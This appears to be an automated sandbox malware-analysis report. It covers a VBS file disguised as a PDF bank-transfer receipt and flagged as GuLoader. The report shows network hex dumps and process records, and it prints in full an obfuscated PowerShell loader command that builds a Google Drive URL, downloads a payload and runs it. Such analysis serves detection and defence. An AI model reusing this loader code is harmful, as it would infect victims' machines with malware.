                                                      2024-10-01 05:43:05 UTC4858INData Raw: bb 2c 34 2b a8 ea 0b de 4a df 0d 88 2b 80 c5 3f c6 08 cf a4 63 69 1e 40 a0 15 84 9e db b9 43 27 e0 30 cd e0 db 57 68 63 86 df 52 de fa 8c da 19 5d 25 8c 3e a2 04 b9 30 a4 bd 36 6d ef 4f c5 00 8f 40 91 a2 ff 1f 82 fa f9 bd 68 2b a6 54 26 5f 59 7e e3 86 18 93 55 2b 4b 6b 1a 59 b9 fe c0 9d 45 0a 89 4c 33 d1 21 70 ff 90 80 f0 f9 74 1e 2d fa ed 29 f1 f8 19 16 8c eb 08 54 8d 2d df b0 22 88 39 96 39 15 c7 a3 15 00 71 e9 36 44 a4 f0 93 d6 e0 bf 8f 0a 00 1d 37 fc 4b fd 62 d0 71 a3 c1 37 64 04 ab 51 20 fc f1 64 c7 87 9d c0 f3 bb 5c 2f 92 6c 20 57 9e 16 e8 8f 1d 8c b0 11 e6 ad 25 36 e4 44 3b 32 12 97 d0 f0 83 28 20 0c 3c 99 8b e8 df 1c 7e 98 45 f9 ff 2d 0e 5c 78 11 b6 14 f2 c1 62 56 62 47 0e a6 a2 14 30 30 e3 fa 8a 41 6c f4 28 27 c7 bf 0c dc d0 e9 3a ec d7 1d 3e f9
                                                      Data Ascii: ,4+J+?ci@C'0WhcR]%>06mO@h+T&_Y~U+KkYEL3!pt-)T-"99q6D7Kbq7dQ d\/l W%6D;2( <~E-\xbVbG00Al(':>
                                                      2024-10-01 05:43:05 UTC4858INData Raw: c9 84 2d 48 37 24 17 18 f5 3a f8 a4 b3 78 24 10 1e fd f7 09 47 1d 6a 1c f7 4a 78 e3 48 9e e2 22 0c a3 19 f1 b2 f1 f5 3e d2 ff 9f 28 3f 3e b0 49 4d ed d1 d7 56 08 cb 66 60 0d 36 2b cc 33 28 16 3f db 60 46 b3 f3 e9 b7 2b a4 4f 3a c7 45 1d 73 01 03 4d be 1d fd 63 8e f6 c9 b3 f9 25 6f de 61 70 ae 7e 69 e9 59 76 20 52 e5 c2 fe f3 ba a4 6e e1 c7 d7 ef 65 04 90 06 55 19 7f 06 3b 96 78 67 fc 97 be a2 64 e0 74 65 ec 62 7f 77 10 4a f8 c1 2c 4f f0 ff 24 30 94 a5 d2 ec 90 4e db b9 5e 92 42 39 96 d8 9e 53 aa 37 56 4b fa a9 a6 55 8b 36 6d 48 19 00 4c 28 35 23 54 44 84 58 be 3a 3b 82 c0 33 9d 77 90 54 77 e6 a4 24 24 54 03 ab ff b2 97 0c f8 13 b3 6b 04 09 cc 12 e6 2e 74 1f 0d 0f e1 83 ac e7 27 b1 a6 0d 21 ec 55 6a 9f 1b 91 1d be 08 ba 32 91 f8 bd fe 6b 57 2a b6 9d 14 4c
                                                      Data Ascii: -H7$:x$GjJxH">(?>IMVf`6+3(?`F+O:EsMc%oap~iYv RneU;xgdtebwJ,O$0N^B9S7VKU6mHL(5#TDX:;3wTw$$Tk.t'!Uj2kW*L
                                                      2024-10-01 05:43:05 UTC128INData Raw: b5 3a 30 0d 3f 88 30 28 04 d5 a5 e6 98 ff 35 01 00 f2 ae dd ca e7 b9 52 7b 58 5d 14 10 77 1c 1c d1 37 ba cf ab cb b1 49 bb d6 90 bf 36 24 3e 08 24 8a 72 da fa fb a4 7f 20 24 55 f8 51 f1 d6 09 e2 a6 e7 f1 9f a8 b5 53 d0 cd 61 ea 65 29 80 f1 f0 09 e2 6a f5 c0 ba 3a 97 c0 90 2d 57 0c 66 74 7c 11 ae b4 9a 27 b9 95 44 7c a5 3f fb 0b 7f a9 69 00 8b f1 6e a3 a9 4b 73 47 92 b9 d0 3e 99 57
                                                      Data Ascii: :0?0(5R{X]w7I6$>$r $UQSae)j:-Wft|'D|?inKsG>W
                                                      2024-10-01 05:43:05 UTC1319INData Raw: 0b 2a de 87 5f db 3d f9 58 9e 92 e2 66 88 85 3c c1 e4 7d dd a5 9a f0 9b be 43 0e ad eb 30 6e 68 24 96 60 92 9e ec 59 e9 af f9 f8 bc 77 76 e4 21 12 fa 6b 24 53 ca 9b a8 75 fd 13 bf 09 e8 47 79 9f 61 99 08 25 e4 eb de de 9f ca 65 49 7f 19 01 da c0 d3 a5 ee 66 c5 f5 19 e8 2c 72 f4 74 d9 bc 3d c7 e8 ad 55 ff 5d 0e fa 6d 67 92 63 f0 9a 72 37 12 bc ba 97 c6 2d ad 57 2e 53 18 d9 21 57 c1 b0 51 a9 c6 9e 42 d5 9d 08 0b 01 55 f9 bd e0 dc 64 99 ad 59 14 14 58 56 af ac f2 ac 99 39 ff 2e eb d9 bb 37 6c e6 4e 5f 8b 70 22 5f 28 2f 2f f1 6c e1 b8 52 04 d7 29 26 d0 33 8b 39 8a 5a f8 f0 df d8 e8 fa 38 ef 44 ab ca 08 2e a8 89 1d 9d e9 4d bb 88 9c 53 f2 c6 10 44 4f 50 28 71 49 10 09 bb 92 4e b8 84 30 13 21 71 e8 ab 9c 20 5e 85 b0 3a 38 19 16 e5 17 2d c2 fc 94 77 45 e1 31 6f
                                                      Data Ascii: *_=Xf<}C0nh$`Ywv!k$SuGya%eIf,rt=U]mgcr7-W.S!WQBUdYXV9.7lN_p"_(//lR)&39Z8D.MSDOP(qIN0!q ^:8-wE1o
                                                      2024-10-01 05:43:05 UTC1390INData Raw: 51 9a e4 9e dc 6c 36 d2 87 3a 7a 9a 85 5c eb 23 a3 95 7a 66 46 03 5e 7e 85 d2 e9 41 ce 08 f9 05 f9 e7 cd 6e a9 a6 01 d9 21 35 78 23 81 c1 ed 41 31 01 fe 7e 08 9b 8b c6 f3 83 74 ed 98 36 6f 6a 57 6d c9 ac 59 0b 87 e4 34 f2 a9 37 92 77 da d1 0b 09 ad fe e4 c5 a0 19 e7 38 4f 5e 1e 74 0c 67 18 84 26 83 f0 58 ad 7e d3 d1 fd 40 86 24 7f ca 92 66 8d 40 2d 39 78 9c 5a d6 e7 12 53 09 b6 d3 a4 64 30 04 c1 4d bc 44 5a 5c 14 09 ad f2 92 77 a2 30 ec 59 3e 37 01 7f d5 1b ae d8 42 50 01 e8 af 34 79 23 19 35 62 e6 0a b1 76 08 b3 37 ce d3 16 75 2d a5 4a 36 89 01 1c b2 c3 71 45 d4 b0 c5 2f c5 4b 78 bb 4f 4d 09 5b c1 99 b9 32 41 63 ca ca 0a 67 96 8e c6 01 84 e7 41 c7 3b d1 55 36 cd ba 4b c9 a1 0a 53 1c 91 fe 41 40 c2 85 ac b8 df 85 46 87 ae 47 31 c7 9d 76 12 b1 fe f2 2a 68
                                                      Data Ascii: Ql6:z\#zfF^~An!5x#A1~t6ojWmY47w8O^tg&X~@$f@-9xZSd0MDZ\w0Y>7BP4y#5bv7u-J6qE/KxOM[2AcgA;U6KSA@FG1v*h
                                                      2024-10-01 05:43:05 UTC1390INData Raw: ac 7b 7b d0 a6 6b a4 70 49 89 a8 80 54 1d bc fd 18 b2 44 07 d6 f2 62 47 03 e0 81 3d 76 73 6b ee 09 43 71 ba 1e 81 e0 41 1b 50 bc ff 0b 6b 1a d2 f5 da e0 a6 8a 7d a7 1e b8 1f c9 4e 1a 6f 7f f3 3e ff d0 2e 3f bd c1 c3 1d e6 e9 8f 2c 0b 97 dd dd d6 69 dd 79 a5 e8 3b 9e bd f9 30 3c 2c 17 85 60 af 5b 04 40 1e 9b d0 43 ae f1 8b ea 11 8f e9 b8 fa 32 51 40 83 ed 00 72 97 d9 77 b9 4a 16 42 87 7b eb bf 12 15 db 9d 86 6c 98 26 a7 96 42 e3 f9 0e 49 da c5 14 b0 32 5e 0b 82 85 75 9a 36 0f ad c9 b1 0a eb 0c d3 d2 27 a0 d0 82 95 ac 5d 8d 30 fc 2a 4a d9 1b 8d 1f d6 44 98 42 8d ad 9d 1e 77 9c 1c dc dd e6 12 ad 1d a6 ee 51 f3 7d fe 23 81 27 ea 07 e7 27 3b bb d5 e7 be c1 28 ea 9c 51 61 7f 87 2a 83 76 23 c2 94 88 53 fc 64 78 a5 b9 51 49 ed 63 9d ac 69 77 58 c2 c5 fa e2 e0 5a
                                                      Data Ascii: {{kpITDbG=vskCqAPk}No>.?,iy;0<,`[@C2Q@rwJB{l&BI2^u6']0*JDBwQ}#'';(Qa*v#SdxQIciwXZ
                                                      2024-10-01 05:43:05 UTC1390INData Raw: 56 ad 59 4a 4a 0e a7 14 59 c2 aa 9f ff d8 f4 ac 17 72 71 34 2b be ab ba ff 12 23 28 d8 ac d0 2c 34 dc 20 39 c4 3b 79 31 7e 7e 4b f5 48 72 df 0f a9 88 15 b5 76 03 de 5d 02 d1 ec 85 b5 1b 8e 83 63 ef b8 23 f1 e2 66 94 40 8c 70 35 53 6a d8 b1 59 f1 a2 ca c8 1b 97 6e 46 94 ba fe 7c d8 d7 f8 d7 01 56 3d d5 49 77 f0 01 6d 4a 83 5d 40 f0 b9 fe 6e 6b be eb d9 5e f6 2a 66 73 b4 2d 06 f2 2a 7d ae f3 5e 66 7e 8f 53 09 23 4d 2e f6 23 39 34 49 bc 39 5e 22 03 68 68 67 56 05 36 32 44 d2 64 f4 15 4d d4 72 33 be 03 0c 08 5b 64 97 8d 37 83 d6 e2 84 28 0d 33 00 96 bf be 02 af 85 bb 48 df 1f 20 fe f1 33 0c 7e bf 46 eb 77 fe 27 70 c2 58 60 b3 8a b4 ff a5 18 cd bc 9b cc 5a 7a 20 23 9d be 1c 9f 6d c7 f4 09 d1 ae 27 cd 1c 1a c2 b3 67 4f d4 9f 68 7e 0a f1 46 b1 16 55 a1 3c 3f bf
                                                      Data Ascii: VYJJYrq4+#(,4 9;y1~~KHrv]c#f@p5SjYnF|V=IwmJ]@nk^*fs-*}^f~S#M.#94I9^"hhgV62DdMr3[d7(3H 3~Fw'pX`Zz #m'gOh~FU<?
                                                      2024-10-01 05:43:05 UTC1390INData Raw: 62 c6 c2 ee 6b c9 26 27 dc 67 9c f3 90 aa 34 54 8c 6d fb 2d bf b4 88 73 58 8b 5d 7a 99 ec df d0 14 df bc ef 56 e3 3a 3c 83 70 6b 82 69 02 5b 25 db b1 dd a8 cc c0 5b a5 3c 2b 84 35 96 69 2a f3 d7 60 cd 6f cb f8 0e 3b a7 09 7e ae c1 01 3c 60 1d d0 fe 5d 44 e7 52 9c 09 ae c9 5a 8e b6 9b 0d 14 44 f7 f8 06 eb cc 22 f8 b0 ef 8c 29 8a 4b 5c d3 ce 16 95 09 5f 2b 43 84 04 41 03 e1 d8 0e 10 fb de f5 01 83 19 8e 56 3e 06 64 da 95 b3 2f eb d5 af 60 8c 86 e7 e3 cc 1a e0 b9 ac f3 a7 bb ec 62 77 32 82 b7 9f a1 2b 85 cc 5f 7a 2f da b5 f3 2f f7 3a 11 23 3e 2d 79 d9 5b 74 46 b8 04 3c d5 cf 86 d5 8d a9 7d 27 10 99 65 e4 6b 36 7c 10 4d f5 61 1f 04 60 54 ad 15 83 2f f0 ec eb 32 97 bf 9a ad fd 62 9a 92 89 fb 8b 4f 66 d9 6a d6 93 1d a1 f1 2d d6 0f ca 58 f2 bb 78 92 50 69 1b 61
                                                      Data Ascii: bk&'g4Tm-sX]zV:<pki[%[<+5i*`o;~<`]DRZD")K\_+CAV>d/`bw2+_z//:#>-y[tF<}'ek6|Ma`T/2bOfj-XxPia
                                                      2024-10-01 05:43:05 UTC1390INData Raw: c0 5b c0 99 c4 0f 41 63 f2 66 58 69 4d a9 ab dd 93 4c 15 fc c8 d1 56 48 ed 29 f4 62 b5 57 ea 01 48 7b 15 07 0a 85 27 76 5d 2f 49 0c 75 d3 ef d5 ee 24 99 f5 5f f2 53 6c fb 66 fb 61 bc 1a a6 bc 54 e9 63 35 f7 ba 1f 17 9b d9 97 e5 59 03 59 59 55 e6 5e c8 ca 01 e4 07 2b 9b c2 38 2e b1 a9 8b ab 2c d5 51 92 9d 19 fd f2 c6 5e 94 b1 1e ba 15 f4 86 9b f4 e6 ff 2e 99 86 f9 8d 14 a0 c0 da ad 67 cc a6 a4 74 32 0b 14 d7 c3 89 78 5b 8e d9 8b bd 22 0d 96 ee ed c6 77 49 ec 02 1d d0 aa 5d 01 c9 e0 8e 6e 07 2b 5c 56 24 cb 76 4d 4c 87 98 43 a6 e7 73 5c b7 ae 3a 52 77 73 46 91 7a 1f a2 65 51 03 69 e1 2f 52 17 8d 8c 8a a5 ad 42 13 33 e7 f4 9f a1 99 83 d2 03 31 02 87 51 b1 e6 08 83 2d 82 94 d7 1b 4e ff d1 76 0d bf b1 48 e1 83 65 15 78 fe a0 ae ad c3 bc 28 bb ab 04 ac 80 e3 db
                                                      Data Ascii: [AcfXiMLVH)bWH{'v]/Iu$_SlfaTc5YYYU^+8.,Q^.gt2x["wI]n+\V$vMLCs\:RwsFzeQi/RB31Q-NvHex(
                                                      2024-10-01 05:43:05 UTC1390INData Raw: 46 7e d8 8e 6e 78 68 c6 dc 6b 34 c7 e2 c0 7c 20 6f d2 6f b7 95 bd 52 20 f8 46 7f 93 fb 14 92 31 c3 94 03 fc b8 a8 e0 c8 02 8a 5a 22 57 32 ed 50 a5 a0 59 5b bb 53 92 89 d5 f3 9f ef 57 fd dc e9 5c 0c 20 6b db 39 9f 42 da 3f eb 41 09 1b 8f 41 27 7e 97 b3 08 e2 a5 70 dc f9 aa f4 12 f6 ed 9a 28 93 d6 af 52 cb 19 d4 07 25 ad ac 26 9d 7b 04 84 79 f3 b1 3a a5 b2 b5 4c 6f 20 e1 fd 35 a4 39 c3 15 ed 3d e5 d0 70 db 7b 10 8d 6d dd db e9 dd ba ce 0e bb 29 48 ad 8e e4 bb c7 49 17 36 2f e6 ad 7f 06 ac e9 14 2c 4b 90 e3 5b eb fc 56 1b 07 3d 5b 6d e0 9a 0f 21 17 a9 8c cf 76 28 3d fe d3 e5 45 bc 8d cd e5 25 25 28 ad 34 0b 32 2d f3 f7 b0 11 4e b4 a3 48 30 4e 35 6f 98 28 16 4c 2c d2 62 11 e6 9b 83 23 3f cd 70 63 0f 09 75 63 8e dd c1 1b a5 d6 1b ca 6d 25 80 37 cb 12 26 8f 15
                                                      Data Ascii: F~nxhk4| ooR F1Z"W2PY[SW\ k9B?AA'~p(R%&{y:Lo 59=p{m)HI6/,K[V=[m!v(=E%%(42-NH0N5o(L,b#?pcucm%7&


                                                      Statistics

                                                      CPU Usage

                                                      Click to jump to process

                                                      Memory Usage

                                                      Click to jump to process

                                                      High Level Behavior Distribution

                                                      Click to dive into process behavior distribution

                                                      Behavior

                                                      Click to jump to process

                                                      System Behavior

                                                      General

                                                      Target ID:0
                                                      Start time:01:42:08
                                                      Start date:01/10/2024
                                                      Path:C:\Windows\System32\wscript.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Recibo de transferencia#U00b7pdf.vbs"
                                                      Imagebase:0x7ff74a480000
                                                      File size:170'496 bytes
                                                      MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      General

                                                      Target ID:1
                                                      Start time:01:42:11
                                                      Start date:01/10/2024
                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Panglossian Faktotumerne udfrelserne #>;$Espes='Nednormeringen83';<#Pirat Misjudgment Retroaktiv #>;$Buedes=$host.PrivateData;If ($Buedes) {$Burundieres++;}function Balladised($Alfedronnings47){$Udfrier=$Storcirklernes+$Alfedronnings47.Length-$Burundieres;for( $Haltered=5;$Haltered -lt $Udfrier;$Haltered+=6){$Sparebssernes+=$Alfedronnings47[$Haltered];}$Sparebssernes;}function Revanchistens($Nedlggende){ &($Rhabditis) ($Nedlggende);}$Eral219=Balladised 'StrstMDi sooUn erz SpliiDataololieflN.stlaTyp.s/Spast5Sved..Boeth0 akan pil( TiphW GastiAdvokn Dispd AmagoPurunwArch.s Eksp Bih NZygotTSeque soloe1 Chi.0Varef.Ragas0Cradl;Tienn MurinWBulleiCo.tenAnabo6at ri4Emoll;witch MortexPasti6Unsur4Sil o;Skole PolarrVanhevFrede:Sem c1Telep2Utill1 Upfl.stron0revel)Lauda MaillGBee aeBanklcScallk PaxioFarve/ Fois2Mul i0E end1Eryop0Misad0Intra1Jordb0f.ede1.rers IndheFsadleiG overS.arpetribuf .unjoDr ylxSolda/ Reo,1Ve ne2Subfe1Bact,.Resig0 Ret ';$Quagmirier=Balladised ' Vagau SmarsU dereLetlbrPrefi-harveAHelv GD optE.nindNA,rsdTMedal ';$Tillodont=Balladised 'U svehI.skat eeut .tjnpTndesspos t:Tsun,/Launc/OverfdForplrL rriiM,cigvAnisoeTabul.Waltog VrdioNonstoTrl ogreapolArchaeCinde.G,arycAfgr,o anim tave/Adjuru ViftcKoebu?Mod,aeUnderxBacktpGavekoTetrar ersotU,der=ArbejdNonproByde wG antn Fratl Pagio Pe pa ForpdAkkil&LytteiAvinddSka t=svire1Otocem refaVBeh nv ResesUnf.mI DiplVVanteWSnust7Udsig- S ovx Side9Ho orDDatabjJapanCAdonio Offe7OnicouDraabv F ge1 dioxZAprilODikkeoOdou Z MemptSrtjeTDamilNEpi azUngdoVStaliEFingeFPistoBPoppi5antem ';$Semimanagerial=Balladised 'Jal u>Skvat ';$Rhabditis=Balladised 'R,undiRes,aEUns axAmety ';$Scombroidea='Kohave';$Hypersensuously='\Margenindstilling.Sys';Revanchistens (Balladised 'Rockl$Blubbg HooclRe.isoSnitcbS rumaUnderlScrat:un exAtonesrSt rbv hum eDiskpmSlagfsHedess olsiPertigKursetutilg=Inter$ReannePer,sn ,evivAutor:Br.araMedmepSkibspOpf.ldTetr a OvultIdealaSlett+ nges$ ,ervHMinilyAiracpLeveaeKil erKbmanstid,eeShopfnPrav sTe rauUdv.koOp rauTewtasHom nlbundfy,absl ');Revanchistens (Balladised 'Lenna$Selvbgravetl PrepoSemidbFleksawarmhlElkos:Ov rcO LayevHy ereDriftrTo ollSett,sDemagsT kpleJord.t ealls .lfe=Buchs$ConosTRomanistvkolNickllFejl,omidsodKlyngo EngonSuba t lmu.TavlesFrie.psuperl TrafiComedtPenda( oris$ FlugS Je ne PhysmFis eiI,termBeci aSkrifn WorsaBlo.mgFornyeIntr.rIdrtsi Ma,ta Ansal svbc) Filn ');Revanchistens (Balladised 'Forgj[tandsNUnc ie sangt P am.JournSB rtkeScriprBagsivU.duciBrle.cBan eeSikrePCardooOv,rmi TilbnUdad tBarriMVaernaPsychn.eminaPrimpggenneeSkib,rLep o]Forre:Dever:DeodoS SemeeFlaggcorganuSmkfyr CuttiSevertAkvaryCruciPStandrMonk,oT utot .nfeoSofa,c Sammo Antil flir Gimme= Udva Mejed[ DomiN UdpleStudct Eph . PlanSQerumePilotcFordruSek.dr Thebi KnartIndusyExtraPGif wrDeadboDecomtErminovsentc FleroJakoblMoti,T Repoy cinepafslueUsort]Bever: Und :PseudTDragslLikrss.assa1Rigou2Supra ');$Tillodont=$Overlssets[0];$Suspensoriers34=(Balladised 'Facad$ret eGAntrolSlagto Bia BProl,AMatriLBegum:CanopAhuberD PlayvTsem.oRemodkseveraPlum tT,mlekP,lsaoTh rmNDylanTAccelo alkeRPercue Sp lrSymassstai =KartonFremme Su,ewN.sic-Stud.OUp,albCatecJTaveseomby,CTi ett Bonn Hirp.STriv YBo pes,isteTCrocoEFo.taM,latt. FrodnVenefEPlasttSeman. DiviWAfreneYndtuBTellucUniveL iviISlopee ForpN PoddTOdori ');Revanchistens ($Suspensoriers34);Revanchistens (Balladised 'Frugt$.sesvARadikd WorkvCurteoAnne,kGrinda ontatD.zenkRevolo nglen Om stEttaloCrystrDetereFo svrfemtes afi.N sseHFo,bret.ropa sheldEksameCentrrAdr as c rc[Aktio$MentiQCon.euSuavia Ant gAlbi mAithti.rinsrGreeniTetcheFrih.rBrug ]Betha=Coqu.$Skru EAnmrkr Batha Brugl Flor2Ant q1Gummi9Respe ');$Indeterminateness=Balladised 'monor$ Ud,iAwildcdTribuvLooseoAlle kLukkeaHakamtFjer kHe rioOpsvunPha.nt Introve strUnma e La tr slutsRetra.SafirDFrankoTur,sw p ykn PibelSlip.olovfsaFarved SoleFLigniistricl olvredenar(Montr$BintjTbreviiIngenlMatamlgreneoK lesdSergeo ekvinstvkot Kn.r,Dags.$RetinRSyranoenvelvBen vdCa loyBas arIsenke Co,enSaddleG.atesCit o)satir ';$Rovdyrenes=$Arvemssigt;Revanchistens (Balladised 'Raget$ ennuGLibidLFamiloCommybprecoAEnerglGloba:OmfanPM culIN.lliL DobbK Skumo.imorMCirkuBPhantIundernberigAKrimiTAfmeliInjurODev,lnGratiePartir Sprj=V ldt(SammeTunoveEOplsnsGangltKon.u-,indepSaliaaargentTr peHbretw Fines$VibrorTotalOVersiV Quadd onpaYKr mer SoldEBasilNTapiseUds us Mjdu)Nonap ');while (!$Pilkombinationer) {Revanchistens (Balladised 'Shr.v$FortrgUltimlRtehao Spejb Stanacalanl Leuk:Ak,liEHorricNachsoMaskisDolorpCatsteO,ertcEnginiDitlefSka eiTempecUngdoa Fanal Impel Skruytolds=Build$StuditPhosprcyanouSolece.laam ') ;Revanchistens $Indeterminateness;Revanchistens (Balladised 'Mark,S F,rmt HuslaTyrisrskrivtSan s-AfvikSAdra.l sevreIrrige Darnp Arr Unpes4Nond ');Revanchistens (Balladised 'Katmo$v.ndfg StivlSquamoM thobDeliva lvelU sen:Ja,anPNedriiAmolalTormekFonduohin emSuperbLabeli InjunB samaIndpat ReseiHalvtoMicron HvidegenlsrAmbol=Inde.(A omaTPubliexanthsHaveetHerre-CommuPElektaStatztMuscuhTwadd ,istr$BrandRDulluo Ytt vGrutcdEmbryyMlkekrM ssee.tivrnGarveeV gsesDians) rome ') ;Revanchistens (Balladised ' Vair$EmittgRe eml LibioSprjtb StudaSnesklBilbi:Lg erR argaeH ndenOutpusRou,ee lastmBaha aUnvicsCraftk nfuliCentrn ArsaeTerrosRib y=Arbej$FavelgTubtalSync o B rab pallaAmb llIsole: Sy hFKasteoAfparrNapalgPleuriBryghvDra teFloranSf esdT lefe ntros Effe+Pigh +Cong.%Al rg$OxyteO IntrvcamemeSulfar HypolSlavosUnshas Ass,e rubutOrdnus Otol.GeschcMechaoWoodcu ,odenOmbaet Coti ') ;$Tillodont=$Overlssets[$Rensemaskines];}$Dralonens=329627;$Haltereddijassociationens=32015;Revanchistens (Balladised ' Sofa$Fer kgUncaulMingeo Hemibscagla Ban lS ump:.orplO S,rfuTimistUn rydPas erLeasiaDiskenCob.ik Bery Afhug= Undi Spot GPlat eLugsptAou l-Su dhCOverbo cl mn Ro.et SodaeRep tn celitudpos Maski$NoninRVerd.oEntrav ndendGeogryZoquerLoutieHeartnSnubbeAboits Ilma ');Revanchistens (Balladised 'In er$ FagogSan,tlOversoArvinbTeknoaEfterlNonob: rgesVAfhrdiPolemd ReuneSelvooVerdeb.inieaRegneaSo ianAktuadPer ooV,dlipCastatIndstaKafeegFab leUhildrKlutze ForpnM.rri1Ame t7Dmpef7Redn B tik=F,lig Proto[CircuSnglesyunders TrestKultie Ju.tmPinta. ScraC MiljoLinienTilmev,freje F ksrundertSymbo] Wind:Unamp:UdfylF nimarSamnooIodatmGerm,BU deraFinmesBurreePilla6 Bekr4TekstS odgtM tchrMus ciT.rninGastrgNo.co(rytt $ KeapOVermeuGpscotVedkedSicinrStaalaKendinskab.kCyst )Igang ');Revanchistens (Balladised 'Cir i$ Sy bgcondulSarcoo PrefbKla.eaM.zarl Riga:Sig.iSRegant takirFeltieplsergBloduk Di.go Mulid Nihie Preds Har .ooid=Speci Vold.[ObersSVenliyc.mifsGoositTr dke Sp,tmR,nve.afledT S nke I cox leet Ukra.,icheEbo ndnPrepocRedegoRandsd Compi We,tnDisseg Arve]Kinco: Korf:nachoAMalvoS tvi CBr okIMin.rIJambo.Kv teG Erine Ra ntFremtS TidstgennerPilkei omtenBogengImmun(Obloq$InvenVDurosiMargidPlaceeHjlpeoSy,urbskvataMar,ka Udrkn SoladAvnesoM,liepN neqt uds,aB,attgVini.eUnaverPerlae Disen Libe1Gusta7Stjpl7 chas)Can p ');Revanchistens (Balladised 'Cathe$AnakrgDecarlparr olavanb JadiasynaglStrmk:SvejsCtusheaFragirPjankbToe oo RadinTrembasippet St eiSadelsQuadra AlgotDeba.i,rafio OptanB.hoo= Tryk$TheekSK geltDenitrKaviteT,ningPentakSpilooIransdMenseeMillesRepin.vold sTrojkuMet obJern sOrchetforurr Ungri Weisn ,oungPunkt(Du ke$BrnemDPyri rBorema Coazl eaktoTele.n Impoe Milin Se isTa.il,Land $ AnatHAntitaSy tel HenstRenseeHan or ,stfeJeremdSark dHelleiRet ojKonseaBowelsCe ers ZymooPurunc Gla.iFonaca Pop tgardeiKart,oF glenRefereImpernUnobjsPhilo)Udsmi ');Revanchistens $Carbonatisation;"
                                                      Imagebase:0x7ff788560000
                                                      File size:452'608 bytes
                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000001.00000002.1880233584.000001F8A8C05000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      Reputation:high
                                                      Has exited:true

                                                      General

                                                      Target ID:2
                                                      Start time:01:42:11
                                                      Start date:01/10/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff7699e0000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      General

                                                      Target ID:3
                                                      Start time:01:42:22
                                                      Start date:01/10/2024
                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "<#Panglossian Faktotumerne udfrelserne #>;$Espes='Nednormeringen83';<#Pirat Misjudgment Retroaktiv #>;$Buedes=$host.PrivateData;If ($Buedes) {$Burundieres++;}function Balladised($Alfedronnings47){$Udfrier=$Storcirklernes+$Alfedronnings47.Length-$Burundieres;for( $Haltered=5;$Haltered -lt $Udfrier;$Haltered+=6){$Sparebssernes+=$Alfedronnings47[$Haltered];}$Sparebssernes;}function Revanchistens($Nedlggende){ &($Rhabditis) ($Nedlggende);}$Eral219=Balladised 'StrstMDi sooUn erz SpliiDataololieflN.stlaTyp.s/Spast5Sved..Boeth0 akan pil( TiphW GastiAdvokn Dispd AmagoPurunwArch.s Eksp Bih NZygotTSeque soloe1 Chi.0Varef.Ragas0Cradl;Tienn MurinWBulleiCo.tenAnabo6at ri4Emoll;witch MortexPasti6Unsur4Sil o;Skole PolarrVanhevFrede:Sem c1Telep2Utill1 Upfl.stron0revel)Lauda MaillGBee aeBanklcScallk PaxioFarve/ Fois2Mul i0E end1Eryop0Misad0Intra1Jordb0f.ede1.rers IndheFsadleiG overS.arpetribuf .unjoDr ylxSolda/ Reo,1Ve ne2Subfe1Bact,.Resig0 Ret ';$Quagmirier=Balladised ' Vagau SmarsU dereLetlbrPrefi-harveAHelv GD optE.nindNA,rsdTMedal ';$Tillodont=Balladised 'U svehI.skat eeut .tjnpTndesspos t:Tsun,/Launc/OverfdForplrL rriiM,cigvAnisoeTabul.Waltog VrdioNonstoTrl ogreapolArchaeCinde.G,arycAfgr,o anim tave/Adjuru ViftcKoebu?Mod,aeUnderxBacktpGavekoTetrar ersotU,der=ArbejdNonproByde wG antn Fratl Pagio Pe pa ForpdAkkil&LytteiAvinddSka t=svire1Otocem refaVBeh nv ResesUnf.mI DiplVVanteWSnust7Udsig- S ovx Side9Ho orDDatabjJapanCAdonio Offe7OnicouDraabv F ge1 dioxZAprilODikkeoOdou Z MemptSrtjeTDamilNEpi azUngdoVStaliEFingeFPistoBPoppi5antem ';$Semimanagerial=Balladised 'Jal u>Skvat ';$Rhabditis=Balladised 'R,undiRes,aEUns axAmety ';$Scombroidea='Kohave';$Hypersensuously='\Margenindstilling.Sys';Revanchistens (Balladised 'Rockl$Blubbg HooclRe.isoSnitcbS rumaUnderlScrat:un exAtonesrSt rbv hum eDiskpmSlagfsHedess olsiPertigKursetutilg=Inter$ReannePer,sn ,evivAutor:Br.araMedmepSkibspOpf.ldTetr a OvultIdealaSlett+ nges$ ,ervHMinilyAiracpLeveaeKil erKbmanstid,eeShopfnPrav sTe rauUdv.koOp rauTewtasHom nlbundfy,absl ');Revanchistens (Balladised 'Lenna$Selvbgravetl PrepoSemidbFleksawarmhlElkos:Ov rcO LayevHy ereDriftrTo ollSett,sDemagsT kpleJord.t ealls .lfe=Buchs$ConosTRomanistvkolNickllFejl,omidsodKlyngo EngonSuba t lmu.TavlesFrie.psuperl TrafiComedtPenda( oris$ FlugS Je ne PhysmFis eiI,termBeci aSkrifn WorsaBlo.mgFornyeIntr.rIdrtsi Ma,ta Ansal svbc) Filn ');Revanchistens (Balladised 'Forgj[tandsNUnc ie sangt P am.JournSB rtkeScriprBagsivU.duciBrle.cBan eeSikrePCardooOv,rmi TilbnUdad tBarriMVaernaPsychn.eminaPrimpggenneeSkib,rLep o]Forre:Dever:DeodoS SemeeFlaggcorganuSmkfyr CuttiSevertAkvaryCruciPStandrMonk,oT utot .nfeoSofa,c Sammo Antil flir Gimme= Udva Mejed[ DomiN 